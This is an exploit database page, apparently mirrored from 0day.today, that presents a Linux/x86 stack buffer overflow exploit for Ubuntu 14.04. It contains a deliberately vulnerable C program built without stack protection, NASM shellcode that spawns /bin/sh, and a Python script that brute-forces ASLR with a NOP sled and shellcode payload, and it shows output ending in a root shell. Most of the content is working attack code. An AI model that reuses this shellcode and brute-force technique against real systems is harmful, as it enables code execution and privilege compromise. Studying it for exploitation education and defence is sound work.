Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x86 - /bin/sh Shellcode + ASLR Bruteforce

🗓️ 27 Jun 2016 00:00:00Reported by Pawan LalType 
zdt
 zdt🔗 0day.today👁 16 Views

Linux/x86 - /bin/sh Shellcode + ASLR Bruteforce for Ubuntu 14.0.

Code
/bin/sh shellcode  Ubuntu 14.0.4 32 bit + ASLR Bruteforce
 
#shellcodeandaslrbruteforce.c
#Tested on : Ubuntu 14.04 32 bits
#Author : Pawan Lal   [email protected]
 
*vim shellcodeandaslrbruteforce.c*
 
#include    <stdio.h>
#include    <stdlib.h>
#include    <assert.h>
#include    <string.h>
 
 
void vuln (const char* arg){
    char buffer[100];
    strcpy(buffer, arg);
    printf("Hello %s\n", buffer);
    printf("[+] buffer @ %p\n", buffer);
}
 
int main (int argc, char **argv){
 
    if (argc != 2) {
        printf("Usage: %s <buffer>\n", argv[0]);
        exit(1);
    }
    vuln(argv[1]);
        return 0;
}
 
Makefile with below command
 
usage : gcc -fno-stack-protector -z execstack shellcodeandaslrbruteforce.c -o shellcodeandaslrbruteforce
 
Turn On ASLR:
 
echo 1 | sudo tee /proc/sys/kernel/randomize_va_space
#############################################################
 
*shellcode that executes '/bin/sh'*
 
global _start
 
section .text
 
_start:
    xor eax, eax
    push eax
 
    push 0x68732f2f     ;//sh
    push 0x6e69622f     ;/bin
    mov ebx, esp        ;moving the pointer to "/bin//sh" to ebx
 
    push eax            ;push 0 (=eax)
    mov edx, esp        ;moving 0 to edx
 
    push ebx
    mov ecx, esp        ;moving the pointer to "/bin//sh" to ecx
 
    mov al, 11
    int 0x80            ;execv syscall
 
 
 
################################################################
 
*Final exploit using /bin/sh shellcode and ASLR bruteforce*
 
*vim shellcodeandaslrbruteforce.py*
 
#!/usr/bin/python
 
import struct, sys, time
from subprocess import PIPE, Popen
 
# exec /bin/sh
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
 
bufsize = 100
offset = 12     #incl. saved ebp
nopsize = 4096
 
def prep_buffer(addr_buffer):
    buf = "A" * (bufsize+offset)
    buf += struct.pack("<I",(addr_buffer+bufsize+offset+4))
    buf += "\x90" * nopsize
    buf += shellcode
    return buf
 
def brute_aslr(buf):
    p = Popen(['./bof', buf]).wait()
 
if __name__ == '__main__':
    addr_buffer = 0xbf92b39c    # randomly decided
    buf = prep_buffer(addr_buffer)
    i = 0
    while True:
        print i
        brute_aslr(buf)
        i += 1
 
##################################################################
 
 
root@ubuntu:~/bof/shellcodeandaslrbruteforce
⇒ python shellcodeandaslrbruteforce.py
(...)
(...)
 
[+] buffer @ 0xbfc2bc0c
996
(... snippet)
 
[+] buffer @ 0xbfb9930c
997
(... snippet)
 
[+] buffer @ 0xbf92721c
998
(... snippet)
 
[+] buffer @ 0xbf92a26c
# whoami
root

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Jun 2016 00:00Current
7.4High risk
Vulners AI Score7.4
shellcodeaslrubuntu 14.0.4buffer overflowexecutionbrute force
16